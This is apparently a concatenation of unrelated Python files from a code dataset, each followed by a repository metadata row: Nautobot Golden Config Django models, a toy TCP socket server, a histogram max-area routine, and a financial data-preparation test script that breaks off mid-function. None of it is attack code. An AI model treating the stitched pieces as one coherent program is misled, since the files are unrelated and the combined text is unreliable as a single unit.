    missing = models.JSONField(blank=True, help_text="Configuration that should be on the device.")
    extra = models.JSONField(blank=True, help_text="Configuration that should not be on the device.")
    ordered = models.BooleanField(default=False)
    # Used for django-pivot, both compliance and compliance_int should be set.
    compliance_int = models.IntegerField(blank=True)

    def to_objectchange(
        self, action, *, related_object=None, object_data_extra=None, object_data_exclude=None
    ):  # pylint: disable=arguments-differ
        """Build an ObjectChange that excludes the bulky actual/intended configs from the changelog."""
        if not object_data_exclude:
            object_data_exclude = ["actual", "intended"]
        return ObjectChange(
            changed_object=self,
            object_repr=str(self),
            action=action,
            object_data=serialize_object(self, extra=object_data_extra, exclude=object_data_exclude),
            object_data_v2=serialize_object_v2(self),
            related_object=related_object,
        )

    class Meta:
        """Set unique together fields for model."""

        ordering = ["device", "rule"]
        # Exactly one compliance record per (device, rule) pair.
        unique_together = ("device", "rule")

    def __str__(self):
        """String representation of the compliance record."""
        return f"{self.device} -> {self.rule} -> {self.compliance}"

    def compliance_on_save(self):
        """Evaluate compliance and populate the result fields; implementations live in FUNC_MAPPER."""
        if self.rule.custom_compliance:
            # Custom rules require the operator-provided get_custom_compliance callable.
            if not FUNC_MAPPER.get("custom"):
                raise ValidationError(
                    "Custom type provided, but no `get_custom_compliance` config set, please contact system admin."
                )
            compliance_details = FUNC_MAPPER["custom"](obj=self)
            # User-supplied results are untrusted; validate the dict shape.
            _verify_get_custom_compliance_data(compliance_details)
        else:
            compliance_details = FUNC_MAPPER[self.rule.config_type](obj=self)
        self.compliance = compliance_details["compliance"]
        self.compliance_int = compliance_details["compliance_int"]
        self.ordered = compliance_details["ordered"]
        self.missing = compliance_details["missing"]
        self.extra = compliance_details["extra"]

    def remediation_on_save(self):
        """Compute the remediation config before saving; cleared unless remediation applies."""
        if self.compliance:
            self.remediation = ""
            return
        if not self.rule.config_remediation:
            self.remediation = ""
            return
        if not self.rule.remediation_setting:
            self.remediation = ""
            return
        remediation_config = FUNC_MAPPER[self.rule.remediation_setting.remediation_type](obj=self)
        self.remediation = remediation_config

    def save(self, *args, **kwargs):
        """Run compliance then remediation computation, validate, and save."""
        self.compliance_on_save()
        self.remediation_on_save()
        self.full_clean()
        super().save(*args, **kwargs)
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class GoldenConfig(PrimaryModel):  # pylint: disable=too-many-ancestors
    """Per-device record of backup/intended/compliance configs and job timestamps."""

    device = models.OneToOneField(
        to="dcim.Device",
        on_delete=models.CASCADE,
        help_text="device",
        blank=False,
    )
    backup_config = models.TextField(blank=True, help_text="Full backup config for device.")
    # Last attempt vs last success are tracked separately so failures are visible.
    backup_last_attempt_date = models.DateTimeField(null=True, blank=True)
    backup_last_success_date = models.DateTimeField(null=True, blank=True)
    intended_config = models.TextField(blank=True, help_text="Intended config for the device.")
    intended_last_attempt_date = models.DateTimeField(null=True, blank=True)
    intended_last_success_date = models.DateTimeField(null=True, blank=True)
    compliance_config = models.TextField(blank=True, help_text="Full config diff for device.")
    compliance_last_attempt_date = models.DateTimeField(null=True, blank=True)
    compliance_last_success_date = models.DateTimeField(null=True, blank=True)

    def to_objectchange(
        self, action, *, related_object=None, object_data_extra=None, object_data_exclude=None
    ):  # pylint: disable=arguments-differ
        """Build an ObjectChange that excludes the bulky config blobs from the changelog."""
        if not object_data_exclude:
            object_data_exclude = ["backup_config", "intended_config", "compliance_config"]
        return ObjectChange(
            changed_object=self,
            object_repr=str(self),
            action=action,
            object_data=serialize_object(self, extra=object_data_extra, exclude=object_data_exclude),
            object_data_v2=serialize_object_v2(self),
            related_object=related_object,
        )

    @staticmethod
    def get_dynamic_group_device_pks():
        """Get all Device PKs associated with GoldenConfigSetting DynamicGroups."""
        gc_dynamic_group_device_queryset = Device.objects.none()
        for setting in GoldenConfigSetting.objects.all():
            # using "|" should not require calling distinct afterwards
            gc_dynamic_group_device_queryset = gc_dynamic_group_device_queryset | setting.dynamic_group.members
        return set(gc_dynamic_group_device_queryset.values_list("pk", flat=True))

    @classmethod
    def get_golden_config_device_ids(cls):
        """Get all Device PKs that already have GoldenConfig entries."""
        return set(cls.objects.values_list("device__pk", flat=True))

    class Meta:
        """Set unique together fields for model."""

        ordering = ["device"]

    def __str__(self):
        """String representation of the record (the device name)."""
        return f"{self.device}"
@extras_features(
    "graphql",
)
class GoldenConfigSetting(PrimaryModel):  # pylint: disable=too-many-ancestors
    """GoldenConfigSetting Model definition. This provides global configs instead of via configs.py."""

    name = models.CharField(max_length=100, unique=True)
    slug = models.SlugField(max_length=100, unique=True)
    # Higher weight wins when multiple settings match a device (see Meta.ordering).
    weight = models.PositiveSmallIntegerField(default=1000)
    description = models.CharField(
        max_length=200,
        blank=True,
    )
    # Git repository that stores device backup configurations.
    backup_repository = models.ForeignKey(
        to="extras.GitRepository",
        on_delete=models.PROTECT,
        null=True,
        blank=True,
        related_name="backup_repository",
        limit_choices_to={"provided_contents__contains": "nautobot_golden_config.backupconfigs"},
    )
    backup_path_template = models.CharField(
        max_length=255,
        blank=True,
        verbose_name="Backup Path in Jinja Template Form",
        help_text="The Jinja path representation of where the backup file will be found. The variable `obj` is available as the device instance object of a given device, as is the case for all Jinja templates. e.g. `{{obj.location.name|slugify}}/{{obj.name}}.cfg`",
    )
    # Git repository that stores generated intended configurations.
    intended_repository = models.ForeignKey(
        to="extras.GitRepository",
        on_delete=models.PROTECT,
        null=True,
        blank=True,
        related_name="intended_repository",
        limit_choices_to={"provided_contents__contains": "nautobot_golden_config.intendedconfigs"},
    )
    intended_path_template = models.CharField(
        max_length=255,
        blank=True,
        verbose_name="Intended Path in Jinja Template Form",
        help_text="The Jinja path representation of where the generated file will be places. e.g. `{{obj.location.name|slugify}}/{{obj.name}}.cfg`",
    )
    # Git repository that stores the Jinja templates used for config generation.
    jinja_repository = models.ForeignKey(
        to="extras.GitRepository",
        on_delete=models.PROTECT,
        null=True,
        blank=True,
        related_name="jinja_template",
        limit_choices_to={"provided_contents__contains": "nautobot_golden_config.jinjatemplate"},
    )
    jinja_path_template = models.CharField(
        max_length=255,
        blank=True,
        verbose_name="Template Path in Jinja Template Form",
        help_text="The Jinja path representation of where the Jinja template can be found. e.g. `{{obj.platform.network_driver}}.j2`",
    )
    backup_test_connectivity = models.BooleanField(
        default=True,
        verbose_name="Backup Test",
        help_text="Whether or not to pretest the connectivity of the device by verifying there is a resolvable IP that can connect to port 22.",
    )
    # GraphQL query used for Source-of-Truth aggregation (must start with GRAPHQL_STR_START).
    sot_agg_query = models.ForeignKey(
        to="extras.GraphQLQuery",
        on_delete=models.PROTECT,
        null=True,
        blank=True,
        related_name="sot_aggregation",
    )
    # DynamicGroup defining which devices this setting applies to.
    dynamic_group = models.OneToOneField(
        to="extras.DynamicGroup",
        on_delete=models.PROTECT,
        related_name="golden_config_setting",
    )

    def __str__(self):
        """Return a simple string if model is called."""
        return f"Golden Config Setting - {self.name}"

    class Meta:
        """Set unique fields for model.

        Provide ordering used in tables and get_device_to_settings_map.
        Sorting on weight is performed from the highest weight value to the lowest weight value.
        This is to ensure only one plugin settings could be applied per single device based on priority and name.
        """

        verbose_name = "Golden Config Setting"
        ordering = ["-weight", "name"]  # Refer to weight comment in class docstring.

    def clean(self):
        """Validate the scope and GraphQL query."""
        super().clean()
        # A SoT aggregation query is mandatory when the feature is enabled.
        if ENABLE_SOTAGG and not self.sot_agg_query:
            raise ValidationError("A GraphQL query must be defined when `ENABLE_SOTAGG` is True")
        if self.sot_agg_query:
            LOGGER.debug("GraphQL - test query start with: `%s`", GRAPHQL_STR_START)
            if not str(self.sot_agg_query.query.lstrip()).startswith(GRAPHQL_STR_START):
                raise ValidationError(f"The GraphQL query must start with exactly `{GRAPHQL_STR_START}`")

    def get_queryset(self):
        """Generate a Device QuerySet from the dynamic group membership."""
        return self.dynamic_group.members

    def device_count(self):
        """Return the number of devices in the group."""
        return self.dynamic_group.count

    def get_url_to_filtered_device_list(self):
        """Get url to all devices that are matching the filter."""
        return self.dynamic_group.get_group_members_url()
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class ConfigRemove(PrimaryModel):  # pylint: disable=too-many-ancestors
    """Per-platform regex used to strip matching lines from backup configurations."""

    name = models.CharField(max_length=255)
    platform = models.ForeignKey(
        to="dcim.Platform",
        on_delete=models.CASCADE,
        related_name="backup_line_remove",
    )
    description = models.CharField(
        max_length=200,
        blank=True,
    )
    regex = models.CharField(
        max_length=200,
        verbose_name="Regex Pattern",
        help_text="Regex pattern used to remove a line from the backup configuration.",
    )

    # Fields copied when the object is cloned in the UI.
    clone_fields = ["platform", "description", "regex"]

    class Meta:
        """Meta information for ConfigRemove model."""

        ordering = ("platform", "name")
        unique_together = ("name", "platform")

    def __str__(self):
        """Return a simple string if model is called."""
        return self.name
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class ConfigReplace(PrimaryModel):  # pylint: disable=too-many-ancestors
    """Per-platform regex substitution applied to backup configurations (e.g. to mask secrets)."""

    name = models.CharField(max_length=255)
    platform = models.ForeignKey(
        to="dcim.Platform",
        on_delete=models.CASCADE,
        related_name="backup_line_replace",
    )
    description = models.CharField(
        max_length=200,
        blank=True,
    )
    regex = models.CharField(
        max_length=200,
        verbose_name="Regex Pattern to Substitute",
        help_text="Regex pattern that will be found and replaced with 'replaced text'.",
    )
    replace = models.CharField(
        max_length=200,
        verbose_name="Replaced Text",
        help_text="Text that will be inserted in place of Regex pattern match.",
    )

    # Fields copied when the object is cloned in the UI.
    clone_fields = ["platform", "description", "regex", "replace"]

    class Meta:
        """Meta information for ConfigReplace model."""

        ordering = ("platform", "name")
        unique_together = ("name", "platform")

    def __str__(self):
        """Return a simple string if model is called."""
        return self.name
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
)
class RemediationSetting(PrimaryModel):  # pylint: disable=too-many-ancestors
    """RemediationSetting details."""

    # Remediation points to the platform
    # OneToOne: at most one remediation setting can exist per platform.
    platform = models.OneToOneField(
        to="dcim.Platform",
        on_delete=models.CASCADE,
        related_name="remediation_settings",
    )
    remediation_type = models.CharField(
        max_length=50,
        default=RemediationTypeChoice.TYPE_HIERCONFIG,
        choices=RemediationTypeChoice,
        help_text="Whether the remediation setting is type HierConfig or custom.",
    )
    # takes options.json.
    # Free-form JSON passed through to the remediation engine.
    remediation_options = models.JSONField(
        blank=True,
        default=dict,
        help_text="Remediation Configuration for the device",
    )
    # Columns exported by to_csv().
    csv_headers = [
        "platform",
        "remediation_type",
    ]

    class Meta:
        """Meta information for RemediationSettings model."""

        ordering = ("platform", "remediation_type")

    def to_csv(self):
        """Indicates model fields to return as csv."""
        return (
            self.platform,
            self.remediation_type,
        )

    def __str__(self):
        """Return a sane string representation of the instance."""
        return str(self.platform)
@extras_features(
    "custom_fields",
    "custom_links",
    "custom_validators",
    "export_templates",
    "graphql",
    "relationships",
    "webhooks",
    "statuses",
)
class ConfigPlan(PrimaryModel):  # pylint: disable=too-many-ancestors
    """ConfigPlan for Golden Configuration Plan Model definition."""

    plan_type = models.CharField(max_length=20, choices=ConfigPlanTypeChoice, verbose_name="Plan Type")
    device = models.ForeignKey(
        to="dcim.Device",
        on_delete=models.CASCADE,
        related_name="config_plan",
    )
    # The rendered configuration snippet to push to the device.
    config_set = models.TextField(help_text="Configuration set to be applied to device.")
    feature = models.ManyToManyField(
        to=ComplianceFeature,
        related_name="config_plan",
        blank=True,
    )
    # JobResult that generated the plan; deleting it removes the plan (CASCADE).
    plan_result = models.ForeignKey(
        to="extras.JobResult",
        on_delete=models.CASCADE,
        related_name="config_plan",
        verbose_name="Plan Result",
    )
    # JobResult of the deployment; PROTECT keeps deployment history intact.
    deploy_result = models.ForeignKey(
        to="extras.JobResult",
        on_delete=models.PROTECT,
        related_name="config_plan_deploy_result",
        verbose_name="Deploy Result",
        blank=True,
        null=True,
    )
    change_control_id = models.CharField(
        max_length=50,
        blank=True,
        verbose_name="Change Control ID",
        help_text="Change Control ID for this configuration plan.",
    )
    change_control_url = models.URLField(blank=True, verbose_name="Change Control URL")
    status = StatusField(blank=True, null=True, on_delete=models.PROTECT)

    class Meta:
        """Meta information for ConfigPlan model."""

        ordering = ("-created", "device")
        # "created" participates so repeated plans of the same type for a
        # device remain distinct over time.
        unique_together = (
            "plan_type",
            "device",
            "created",
        )

    def __str__(self):
        """Return a simple string if model is called."""
        return f"{self.device.name}-{self.plan_type}-{self.created}"
| nautobot/nautobot-plugin-golden-config | nautobot_golden_config/models.py | models.py | py | 27,885 | python | en | code | 91 | github-code | 36 |
41613286837 | import socket
if __name__ == '__main__':
    # Create a TCP socket.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow the listening port to be reused immediately after a restart.
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Bind to all local interfaces on port 8080 and listen (backlog 128).
    server_socket.bind(('',8080))
    server_socket.listen(128)
    while True:
        # Block until a client (e.g. a browser) connects.
        client_socket, client_addr = server_socket.accept()
        print("接受到来自%s的连接请求" % str(client_addr))
        # Read at most one 4096-byte chunk of the request.
        recv_data = client_socket.recv(4096)
        if not recv_data:
            # Empty read: the peer has closed the connection.
            print("对方已经断开连接")
        else:
            print(recv_data)
        client_socket.close()
client_socket.close() | ABDM357/python_summary_knowledge_001 | Day01-15 Python基础课程/Day01-15课程与项目/07 [项目]web服务器:自己动手实现web服务器/03-代码/00-模拟web服务器接收浏览器的HTTP请求.py | 00-模拟web服务器接收浏览器的HTTP请求.py | py | 661 | python | en | code | 0 | github-code | 36 |
def nextSmaller(arr):
    """For each index i, return the index of the next element to the right
    that is strictly smaller than arr[i]; len(arr) when none exists."""
    n = len(arr)
    res = [-1] * n
    # Monotonic stack of indices whose "next smaller" is still unknown.
    pending = []
    for i in range(n - 1, -1, -1):
        # Discard candidates that are not strictly smaller than arr[i].
        while pending and arr[pending[-1]] >= arr[i]:
            pending.pop()
        res[i] = pending[-1] if pending else n
        pending.append(i)
    return res
def prevSmaller(arr):
    """For each index i, return the index of the nearest element to the left
    that is strictly smaller than arr[i]; -1 when none exists."""
    res = [-1] * len(arr)
    # Monotonic stack of candidate indices, increasing by value.
    pending = []
    for i, value in enumerate(arr):
        while pending and arr[pending[-1]] >= value:
            pending.pop()
        res[i] = pending[-1] if pending else -1
        pending.append(i)
    return res
def maxAreaHistogram(arr):
    """Largest rectangle area under a histogram, using the next/previous
    strictly-smaller indices to bound each bar's maximal width."""
    right = nextSmaller(arr)
    left = prevSmaller(arr)
    best = 0
    for i, height in enumerate(arr):
        # Width spans the open interval (left[i], right[i]).
        best = max(best, (right[i] - left[i] - 1) * height)
    return best
def maxAreaMatrix(arr):
    """Largest rectangle of 1s in a binary matrix.

    Builds a running histogram of column heights (reset on 0) row by row and
    reduces each row to a largest-rectangle-in-histogram problem.

    Fixes vs the original:
    - the histogram buffer was sized ``len(arr)`` (row count) but indexed by
      column, raising IndexError for matrices with more columns than rows;
      it is now sized ``len(arr[0])``.
    - the per-row debug print of the buffer is removed.
    - the maximal area is returned (previously only printed).
    """
    if not arr or not arr[0]:
        return 0
    heights = [0] * len(arr[0])
    area = 0
    for row in arr:
        for j, cell in enumerate(row):
            # A set cell extends the column; a zero resets it.
            heights[j] = heights[j] + cell if cell else 0
        area = max(area, maxAreaHistogram(heights))
    print(area)
    return area
if __name__ == "__main__":
    # Demo only runs when executed directly (previously ran on import).
    # Expected largest all-ones rectangle: rows 1-2 x cols 0-3 -> area 8.
    l = [[0, 1, 1, 0], [1, 1, 1, 1], [1, 1, 1, 1], [1, 1, 0, 0]]
    maxAreaMatrix(l)
| Rohit-2412/DSA | Array/maxAreaRectangle.py | maxAreaRectangle.py | py | 1,577 | python | en | code | 2 | github-code | 36 |
74436410985 | # -*- coding: utf-8 -*-
# Data preparation at one-second level for Ph.D thesis
# @author: Andres L. Suarez-Cetrulo
import glob
import time
import logging
import yaml
import subprocess
import os
import pandas as pd
import numpy as np
import datetime
# Global attributes
SLASH = os.path.sep  # platform-specific path separator
# Seconds per supported time-level unit ('15min' -> 15 * 60 seconds, etc.).
EQUIVALENCE = {
    's': 1,
    'min': 60
}

# logging.getLogger().addHandler(logging.StreamHandler()) # for debugging while coding / comment out otherwise
LOGLEVEL = logging.DEBUG  # logging.WARNING # logging.DEBUG
def get_datetime_format(date):
    """Parse a 'YYYY-MM-DD' date string into a time.struct_time."""
    fmt = "%Y-%m-%d"
    return time.strptime(date, fmt)
def show_missing_values(dates, df_name, df):
    """Log diagnostics about missing values and return the affected columns.

    Args:
        dates: DataFrame of the offending rows, indexed by datetime.
        df_name: label used in the log messages (e.g. the level name).
        df: full DataFrame being inspected.

    Returns:
        list: names of columns containing at least one missing value.
        (The original computed this list but never returned it, despite the
        debug message claiming to.)
    """
    logging.debug('Printing list of dates with missing values in ' + df_name + ' level (e.g. NA and nulls).')
    logging.debug(str(np.unique(dates.index.time)))
    logging.debug('Showing full DF for only rows with missing values in ' + df_name + ' level')
    logging.debug(df[df.isnull().any(axis=1)].to_string())
    logging.debug('Returning the list of columns which have missing values in ' + df_name + ' level')
    nulls = [col for col, has_na in df.isna().any().items() if has_na]
    logging.debug(df.isna().any().keys())
    return nulls
def set_logging(config):
    """Configure the root logger to write to a per-run log file.

    The filename encodes the EFT symbols, starting level and date period so
    different runs write to distinct log files.
    """
    # Set logging level
    logname = str(config['efts']).replace('\'','') + ' Tests across files starting with ' + config['levels'][0] + \
              ' level and period (' + config['start'] + '-' + config['end'] + ').log'
    logging.basicConfig(filename=config['path'] + logname)
    logger = logging.getLogger()
    logger.setLevel(LOGLEVEL)  # module-level default (DEBUG)
    logging.info('')
def log_new_execution(config):
    """Write a banner into the log marking a fresh execution, with the
    start timestamp and the configuration in use."""
    for _ in range(5):
        logging.info('')
    logging.info('#########################')
    logging.info('')
    logging.info('')
    started_at = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
    logging.info('NEW EXECUTION AT: ' + str(started_at))
    logging.info('')
    logging.info('')
    logging.info('#########################')
    logging.info('Logging config settings:')
    logging.info(config)
def log_iteration(config):
    """Log a header identifying the EFT, level and period of the current test."""
    logging.info(' -------------------------------------------------------------- ')
    logging.info(' START OF TEST FOR ' + str(config['eft']).replace('\'','') +
                 ' ' + config['level'] + ' level on period: ' +
                 config['start'] + ' to ' + config['end'])
    logging.info(' -------------------------------------------------------------- ')
def load_config():
    """Load merging parameters (paths, symbols, periods) from ./config.yaml.

    Returns:
        dict: the 'merging' section of config.yaml, enriched with derived
        fields (path, filename pattern, parsed dates, output names and the
        level-dependent feature set).

    Fixes vs the original: the feature-set line referenced the undefined
    name ``nconf`` (NameError at runtime) — ``config`` was intended — and a
    duplicated ``end_date`` assignment is removed.
    """
    with open(os.path.sep.join(['.', 'config.yaml']), 'r') as f:
        config = yaml.safe_load(f.read())['merging']
    # Path where every individual folder is located
    config['path'] = config['src_path']  # + config['level'] + '-level' + SLASH + config['eft'] + SLASH
    config['filename_pattern'] = config['eft'] + '_*_indicators.csv.gz'
    config['start_date'] = get_datetime_format(config['start'])
    config['end_date'] = get_datetime_format(config['end'])
    config['name'] = '_'.join([config['eft'], config['output_subname'], config['level']]) + '-level'
    config['output'] = config['path'] + config['name']
    # The feature set in 15min and 30min levels differs to avoid considering
    # dependencies across days.
    config['featureset'] = config['columns' + config['level']] if config['level'] in ['15min', '30min'] \
        else config['columns']
    return config
def new_config(nconf):
    """ Only use this for testing and not creating of .arff, as we add the field gapt+1 to the featureset"""
    # Path where every individual folder is located
    nconf['path'] = nconf['src_path'] + nconf['level'] + '-level' + SLASH + nconf['eft'] + SLASH
    nconf['filename_pattern'] = nconf['eft'] + '_*_indicators.csv.gz'
    nconf['start_date'] = get_datetime_format(nconf['start'])
    nconf['end_date'] = get_datetime_format(nconf['end'])
    nconf['name'] = '_'.join([nconf['eft'], nconf['output_subname'], nconf['level']])+'-level'
    nconf['output'] = nconf['path'] + nconf['name']
    # The feature set in 15min and 30min levels differ to avoid considering dependencies across days
    nconf['featureset'] = nconf['columns'+nconf['level']] if nconf['level'] in ['15min', '30min'] \
        else nconf['columns']
    # Ensure the class label column is present for the testing routines.
    if 'gap_t+1' not in nconf['featureset']:
        nconf['featureset'].append('gap_t+1')
    return nconf
def load_data(conf, min_time=''):
    """Load all indicator CSVs for the configured EFT/level/date range.

    Iterates the gzipped CSV files matching ``conf['filename_pattern']``,
    keeps those whose filename date range lies inside
    [conf['start_date'], conf['end_date']], restricts each day to the
    trading window [min_time, 16:00] and concatenates everything.

    Args:
        conf: configuration dict (see load_config / new_config).
        min_time: first intraday time to keep; derived from the data when ''.

    Returns:
        tuple: (DataFrame restricted to conf['featureset'], min_time used).

    Fix vs the original: ``DataFrame.append`` was removed in pandas 2.x;
    frames are now collected in a list and combined with ``pd.concat``.
    """
    frames = []
    for filename in sorted(glob.glob(conf['path'] + conf['filename_pattern'])):
        # Extract dates from filename, e.g. EFT_(YYYY-MM-DD_to_YYYY-MM-DD)_indicators.csv.gz
        aux_dates = filename.replace(conf['path'] + conf['eft'] + '_(', '')
        aux_dates = aux_dates.replace(')_indicators.csv.gz', '')
        dates = aux_dates.split('_to_')
        # If file in date range, add it to DF
        if get_datetime_format(dates[0]) >= conf['start_date'] and \
                get_datetime_format(dates[1]) <= conf['end_date']:
            logging.info('Importing data period ' + str(dates[0]) + ' to ' + str(dates[1]) + '.')
            new_df = pd.read_csv(filename, encoding="utf-8", index_col=0, sep=";")
            new_df['datetime'] = new_df.index  # save string readable timestamp as a column
            new_df.index = pd.to_datetime(new_df.index)
            print('Preview of 5 first rows of file being load.')
            print(new_df.head(5))
            # If required, remove times if there are dependencies from previous days,
            # or missing values in certain dates that we should avoid
            if min_time == '':
                print('Rows removed at this level: ' + str(conf['rows_per_day_to_remove'][str(conf['level'])]))
                print(conf['rows_per_day_to_remove'][str(conf['level'])])
                min_time = '09:30' if int(conf['rows_per_day_to_remove'][str(conf['level'])]) == 0 \
                    else get_min_time(conf, new_df)
                print('Current minimum time being considered: ' + str(min_time))
            new_df = new_df.between_time(min_time, '16:00')
            frames.append(new_df)
    df_full = pd.concat(frames) if frames else pd.DataFrame()
    logging.info('Data read.')
    logging.warning('WARNING: Now make sure that the count of rows makes sense for the number of market days:')
    logging.warning(df_full.groupby([df_full.index.year, df_full.index.month, df_full.index.day]).agg({'count'}).to_string())
    return df_full[conf['featureset']], min_time
def get_min_time(conf, df):
    """Return the time-of-day of the earliest index entry after skipping the
    first `rows_per_day_to_remove[level]` rows."""
    skip = int(conf['rows_per_day_to_remove'][str(conf['level'])])
    remaining_index = df[skip:].index.tolist()
    return min(remaining_index).time()
def split_level(txt, seps):
    """Split a level string such as '15min' into ['15', 'min'].

    seps[0] is the default unit; this function would make sense if we had
    tick, hourly or daily level also.
    """
    default_sep = seps[0]
    detected = ''
    # Replace each non-default unit with the default one; if the text
    # shrinks, that unit was present and is remembered.
    for candidate in seps[1:]:
        previous_len = len(txt)
        txt = txt.replace(candidate, default_sep)
        if len(txt) != previous_len:
            detected = candidate
    parts = [piece.strip() for piece in txt.split(default_sep)]
    parts[1] = default_sep if detected == '' else detected
    return parts
def plot_stats(cl_df, ol_df, scl, sol):
    """Log row counts and describe() stats for the current vs compared frames.

    scl/sol are the seconds-per-bar of each level, so len(cl_df) is expected
    to be roughly (scl/sol) * len(ol_df).
    """
    logging.info('Iterated level DF has a length of: '+str(len(ol_df))+' versus a length of: '+str(len(cl_df)) +
                 '. The equivalence should be of: cdf = '+str(float(scl)/float(sol))+'*odf')
    logging.info('Current DF cdf stats: '+cl_df.describe().to_string())
    logging.info('Compared DF odf stats: '+ol_df.describe().to_string())
def test_subsets(df1, df2):
# checking that datetime for the current level exists in inferior levels
key_diff = set(df1.index).difference(df2.index)
where_diff = df1.index.isin(key_diff)
logging.info('Logging difference:')
logging.info(df1[where_diff])
assert len(df1[where_diff]) == 0
logging.debug('Test 2 PASSED: No missing subsets (rows based on datetime) when looking at lower levels.')
def test_number_of_rows(cl_df, ol_df, comparison_type, scl, sol):
    """Check that two dataframes have a consistent number of rows.

    For ``comparison_type == 'eft'`` both frames must have exactly the same
    rows (same level, same period); otherwise the experimental cross-level
    length check is run (single-date only, as noted below).

    Args:
        cl_df: current DataFrame.
        ol_df: other (compared) DataFrame.
        comparison_type: 'eft' for same-level comparisons across symbols.
        scl: seconds per bar of the current level.
        sol: seconds per bar of the other level.

    Fixes vs the original: two calls were written as
    ``logging.infologging.info(...)`` (AttributeError), ``len_cdf``/``len_odf``
    were undefined in the else branch (NameError), and the PASSED/NOT PASSED
    message had an operator-precedence bug that dropped the prefix when the
    test failed.
    """
    if comparison_type == 'eft':
        cl_df.index = pd.to_datetime(cl_df.index)
        logging.debug(len(np.unique(cl_df.index.date)))
        len_cdf = len(cl_df)
        len_odf = len(ol_df)
        logging.debug('Size of c_eft: ' + str(len_cdf))
        logging.debug(cl_df.head())
        logging.debug('Size of o_eft: ' + str(len_odf))
        logging.debug(ol_df.head())
        cl_df['datetime'] = cl_df.index
        print(cl_df[cl_df['datetime'] == '2015-04-01 09:41:15'])
        test = len_cdf == len_odf
        logging.info('')
        logging.info('Test 0: Length of both EFTs have the same length for the same periods and level: ' +
                     (' PASSED' if test else ' NOT PASSED'))
        logging.info('')
        test_subsets(ol_df, cl_df)
        assert test
    else:
        # Test not ready. It only works for single dates.
        from collections import Counter
        cl_df['stridx'] = cl_df.index
        ol_df['stridx'] = ol_df.index
        len_cdf = len(cl_df)
        len_odf = len(ol_df)
        logging.info(pd.Series(cl_df['stridx'].str.split(' ')[0].map(Counter).sum()))
        logging.info(len(cl_df[cl_df['stridx'].str.contains('2015-01-02')]))
        logging.info(len(ol_df[ol_df['stridx'].str.contains('2015-01-02')]))
        logging.info(len(cl_df.loc['2015-01-02' in cl_df.index]))
        logging.info(len(ol_df.loc['2015-01-02' in ol_df.index]))
        logging.info('---')
        logging.info(len_cdf * (float(scl)/float(sol)) * len(np.unique(cl_df.index.date)) -
                     (float(scl)/float(sol) * len(np.unique(cl_df.index.date))) + len(np.unique(cl_df.index.date)))
        # for a single day
        logging.info(len_cdf * float(scl)/float(sol) - float(scl)/float(sol) + 1)
        logging.info(len_odf * sol)
        # for a single day
        # assert len_cdf * float(scl)/float(sol) - float(scl)/float(sol) + 1 == len_odf * sol
def max_and_min_dates(cl_df, ol_df):
    """Log the date range covered by the current and compared dataframes.

    Side effect: adds/overwrites a 'datetime' column on both inputs.
    """
    cl_df['datetime'] = pd.to_datetime(cl_df.index)
    ol_df['datetime'] = pd.to_datetime(ol_df.index)
    for label, frame in (('current', cl_df), ('compared', ol_df)):
        logging.info('Max and min dates in ' + label + ' DF are: ' +
                     str(frame['datetime'].min()) + ' - ' + str(frame['datetime'].max()))
def any_nulls(cl_df, ol_df):
    """Assert that neither dataframe contains missing values.

    The last row of each frame is dropped first (in place), as it may
    legitimately be null for lack of values after 4pm.  On failure the
    offending rows/columns are logged via show_missing_values before the
    assertion fires.

    Fix vs the original: the guard was ``if ~passed:`` — bitwise NOT on a
    Python bool yields -2/-1, which is always truthy, so the diagnostics
    branch ran unconditionally.  ``not passed`` is what was intended.
    """
    # Exclude last row from comparisons as it may be null for lack of values after 4pm
    cl_df.drop(cl_df.tail(1).index, inplace=True)  # drop last n rows
    ol_df.drop(ol_df.tail(1).index, inplace=True)  # drop last n rows
    logging.info('Confirming that both currend compared models don\'t have missing values:')
    passed = (len(cl_df[cl_df.isnull().any(axis=1)]) == 0 and len(ol_df[ol_df.isnull().any(axis=1)]) == 0)
    logging.info(('PASSED' if passed else 'NOT PASSED'))
    if not passed:
        aux_df = cl_df[cl_df.isnull().any(axis=1)]
        aux_df.index = pd.to_datetime(aux_df.index)
        show_missing_values(dates=aux_df, df_name='current', df=cl_df)
        aux_df = ol_df[ol_df.isnull().any(axis=1)]
        aux_df.index = pd.to_datetime(aux_df.index)
        show_missing_values(dates=aux_df, df_name='compared', df=ol_df)
    assert passed
def get_percentage_of_gaps(cl_df, ol_df):
    """Log the fraction of gap labels (gap_t+1 == 1) in both dataframes."""
    current_ratio = len(cl_df[cl_df['gap_t+1'] == 1]) / len(cl_df)
    compared_ratio = len(ol_df[ol_df['gap_t+1'] == 1]) / len(ol_df)
    logging.debug('--------------------------------------------')
    logging.debug('Printing percentage of gaps in current level')
    logging.info(current_ratio)
    logging.debug('Printing percentage of gaps in compared level')
    logging.info(compared_ratio)
    logging.debug('')
    logging.warning('Are the two values above similar enough when compared to the previous testing logs? Manual check.')
    logging.debug('--------------------------------------------')
def compare_levels(cl_df, ol_df, c_level, o_level, featureset):
    """Run the cross-level consistency tests between two dataframes.

    Args:
        cl_df: DataFrame at the current level.
        ol_df: DataFrame at the other level to compare against.
        c_level / o_level: [amount, unit] pairs as returned by split_level.
        featureset: columns to check for missing values in Test 4.

    Fix vs the original: Test 4 called
    ``any_nulls(cl_df[featureset], cl_df[featureset])`` — the second
    argument passed the current frame twice, so the compared level was
    never checked; it now passes ``ol_df[featureset]``.
    """
    logging.info('')
    logging.info('#################################')
    logging.info('')
    logging.info('o_level: '+str(o_level))
    logging.info('c_level: '+str(c_level))
    logging.info('')
    # second equivalence of current level and the other level to compare against in the current iteration
    scl = int(c_level[0]) * EQUIVALENCE[c_level[1]]
    sol = int(o_level[0]) * EQUIVALENCE[o_level[1]]
    # First unit test
    logging.info('Test 1: Stats and counts - Judge manually below to determine if it PASSED. Different number of ' +
                 'columns across levels it\'s ok, as it is a design-made choice.')
